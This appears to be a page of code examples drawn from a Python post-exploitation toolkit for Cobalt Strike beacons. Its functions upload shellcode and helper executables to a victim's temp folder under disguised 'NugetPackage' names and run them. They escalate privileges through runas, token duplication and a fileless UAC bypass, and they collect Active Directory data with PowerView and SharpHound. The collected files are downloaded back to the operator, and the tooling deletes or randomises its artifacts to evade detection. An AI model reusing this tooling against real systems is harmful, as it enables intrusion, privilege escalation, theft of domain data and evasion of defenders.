Exemplo n.º 1
0
def elevate_shellcode_helper(bid, shellcode, function):
    """
    Execute `shellcode` with a helper using <function> -Binary helper.exe -Arguments <shellcode>
    """

    native_helper = utils.basedir('tools/native.exe')
    native_helper_remote = r'{}\NugetPackage.exe'.format(
        helpers.guess_temp(bid))
    shellcode_remote = r'{}\nuget.package'.format(helpers.guess_temp(bid))

    # delete first
    aggressor.brm(bid, native_helper_remote, silent=True)
    aggressor.brm(bid, shellcode_remote, silent=True)

    # upload
    helpers.upload_to(bid, native_helper, native_helper_remote, silent=True)
    helpers.upload_to(bid, shellcode, shellcode_remote, silent=True)

    # invoke
    command = '{} {}'.format(native_helper_remote, shellcode_remote)
    function(bid, command)

    # clean up
    aggressor.brm(bid, native_helper_remote, silent=True)
    aggressor.brm(bid, shellcode_remote, silent=True)
Exemplo n.º 2
0
def elevate_runas_shellcode(bid, user, password, shellcode):
    """
    Elevate with token duplication bypass. Execute `shellcode` with a helper.
    """

    native_helper = utils.basedir('tools/native.exe')
    native_helper_remote = r'{}\NugetPackage.{}.exe'.format(
        helpers.guess_temp(bid), helpers.randstr())
    shellcode_remote = r'{}\nuget2.package'.format(helpers.guess_temp(bid))

    # delete first
    aggressor.brm(bid, native_helper_remote, silent=True)
    aggressor.brm(bid, shellcode_remote, silent=True)

    aggressor.blog2(
        bid, 'uploading to {} and {}'.format(native_helper_remote,
                                             shellcode_remote))

    # upload
    helpers.upload_to(bid, native_helper, native_helper_remote, silent=True)
    helpers.upload_to(bid, shellcode, shellcode_remote, silent=True)

    if '\\' in user:
        domain, user = user.split('\\')
    else:
        raise RuntimeError('must specify user domain')

    # invoke
    aggressor.brunas(bid, domain, user, password, native_helper_remote)

    # clean up
    aggressor.brm(bid, native_helper_remote, silent=True)
    aggressor.brm(bid, shellcode_remote, silent=True)
Exemplo n.º 3
0
def elevate_token_shellcode_csharp(bid, shellcode):
    """
    Elevate with token duplication bypass. Execute `shellcode` with a C# helper.
    """

    aggressor.bpowershell_import(
        bid, utils.basedir('modules/FilelessUACBypass.ps1'))

    execute_shellcode = utils.basedir('tools/execute_shellcode.exe')
    execute_assembly = utils.basedir('tools/execute_assembly.exe')
    stage1 = r'{}\NugetPackage.exe'.format(helpers.guess_temp(bid))
    #stage2 = r'{}\nuget_update.package'.format(helpers.guess_temp(bid))
    stage2 = r'{}\Stage2.exe'.format(helpers.guess_temp(bid))
    package = r'{}\nuget.package'.format(helpers.guess_temp(bid))

    helpers.upload_to(bid, execute_assembly, stage1)
    helpers.upload_to(bid, execute_shellcode, stage2)
    helpers.upload_to(bid, shellcode, package)

    command = 'Invoke-TokenDuplication -Binary {}'.format(
        powershell_quote(stage2))
    aggressor.bpowerpick(bid, command)

    aggressor.brm(bid, stage1)
    aggressor.brm(bid, stage2)
    aggressor.brm(bid, package)
Exemplo n.º 4
0
def _(bid):
    global _uploaded

    temp = helpers.guess_temp(bid)
    dest = r'{}\7za.exe'.format(temp)
    helpers.upload_to(bid, utils.basedir('tools/7za.exe'), dest)
    helpers.explorer_stomp(bid, '7za.exe')
    _uploaded = dest
Exemplo n.º 5
0
def _(bid):
    temp = helpers.guess_temp(bid)

    aggressor.btask(
        bid, 'Tasked beacon to clean up files from domain-enum (stage 3/3)')
    aggressor.brm(bid, r'{}\objects.domain'.format(temp))
    aggressor.brm(bid, r'{}\policy.domain'.format(temp))
    aggressor.brm(bid, r'{}\sites.domain'.format(temp))
    aggressor.brm(bid, r'{}\subnets.domain'.format(temp))
    aggressor.brm(bid, r'{}\gpo_localgroups.domain'.format(temp))
    aggressor.brm(bid, r'{}\gpo_delegations.domain'.format(temp))
    aggressor.brm(bid, r'{}\gpo_acls.domain'.format(temp))
    aggressor.brm(bid, r'{}\trusts.domain'.format(temp))
    aggressor.brm(bid, r'{}\managers.domain'.format(temp))
    aggressor.brm(bid, r'{}\interesting_acls.domain'.format(temp))
Exemplo n.º 6
0
def _(bid):
    temp = helpers.guess_temp(bid)

    aggressor.btask(
        bid,
        'Tasked beacon to download files from domain-enum (stage 2/3). Once finished run domain-enum-next2'
    )
    aggressor.bdownload(bid, r'{}\objects.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\policy.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\sites.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\subnets.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\gpo_localgroups.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\gpo_delegations.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\gpo_acls.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\trusts.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\managers.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\interesting_acls.domain'.format(temp))
Exemplo n.º 7
0
def _(bid):
    temp = helpers.guess_temp(bid)

    # Forests and trusts:
    # Get-DomainTrustMapping
    # Get-ForestTrust
    # Get-DomainTrust

    # Parsing GPOs:
    # Get-GptTmpl
    # Get-GroupsXML

    # File shares:
    # Get-DomainFileServer
    # Get-DomainDFSShare

    # Get-DomainManagedSecurityGroup?

    # TODO remove subnet and site?
    # computer objects don't show up in Get-DomainObject for some reason
    command = helpers.code_string(r"""
        cd {}
        $FormatEnumerationLimit=-1
        Get-DomainObject | Format-List -Property * > objects.domain
        Get-DomainPolicyData | Format-List -Property * > policy.domain
        Get-DomainSite | Format-List -Property * > sites.domain
        Get-DomainSubnet | Format-List -Property * > subnets.domain
        Get-DomainGPOUserLocalGroupMapping | Format-List -Property * > gpo_localgroups.domain
        Get-GPODelegation | Format-List -Property * > gpo_delegations.domain
        Get-DomainGPO | %{{Get-ObjectACL -ResolveGUIDs -Name $_.Name}} > gpo_acls.domain
        Get-DomainTrustMapping | Format-List -Property * > trusts.domain
        Get-DomainManagedSecurityGroup | Format-List -Property * > managers.domain
        Invoke-ACLScanner -ResolveGUIDs > interesting_acls.domain
        echo "All finished with domain-enum. Run domain-enum-next."
        """.format(powershell_quote(temp)))

    aggressor.btask(
        bid, 'Tasked beacon to enumerate domain objects and info (stage 1/3)')
    external.run(bid, 'powerview', command)
Exemplo n.º 8
0
def run_sharphound(bid, args, silent=False):
    temp = helpers.guess_temp(bid)
    args = ['--RandomFilenames', '--EncryptZip', '--JsonFolder', temp
            ] + list(args)
    run(bid, 'sharphound-raw', args, silent=silent)